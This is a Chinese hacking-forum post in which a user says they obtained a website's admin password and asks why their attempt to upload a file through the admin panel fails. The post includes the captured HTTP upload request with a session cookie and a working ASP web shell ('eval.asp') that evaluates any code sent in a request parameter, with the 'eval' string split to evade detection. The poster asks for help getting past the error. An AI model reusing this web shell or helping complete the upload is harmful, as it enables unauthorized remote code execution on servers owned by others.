|
- 帖子
- 176
- 积分
- 477
- 威望
- 758
- 金钱
- 638
- 在线时间
- 0 小时
  
|
[讨论]后台可上传.asp文件,但是写入失败.?
译文作者:miao2
好不容易得到了后台密码,进去后发现可传.asp文件,一下笑了. :-)
但是上传时提示写入失败
ADODB.Stream 错误 '800a0bbc'
写入文件失败。
这是抓包内容:
POST /admin/upload_asp.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxx.com/admin/upload_aspform.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d78c2931029c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xxxxx.com
Content-Length: 761
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTTSDDQ=PPNMLHJDIKINOAIMEOAHHPDH; xoYuStudioUserDj=4; xoYuStudioUserName=admin
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="filepath"
../uploadasp/
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="act"
upload
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="file"; filename="C:\Documents and Settings\et\桌面\eval.asp"
Content-Type: text/plain
<%
set sobiny = server.CreateObject("MSScriptControl.ScriptControl.1")
sobiny.Language="VBScript"
sobiny.AddObject "Response", Response
sobiny.AddObject "request", request
sobiny.ExecuteStatement("ev"&"al(request(""a""))")
%>
-----------------------------7d74e3031029c
Content-Disposition: form-data; name="Submit"
上传
-----------------------------7d74e3031029c--
尝试过修改路径,加空格的方法上传,但是还是不能成功.请高手指教?
帖子26 精华2 积分110 阅读权限40 性别男 在线时间102 小时 注册时间2007-7-28 最后登录2008-7-24 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经
yoyful 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-25 13:53
| 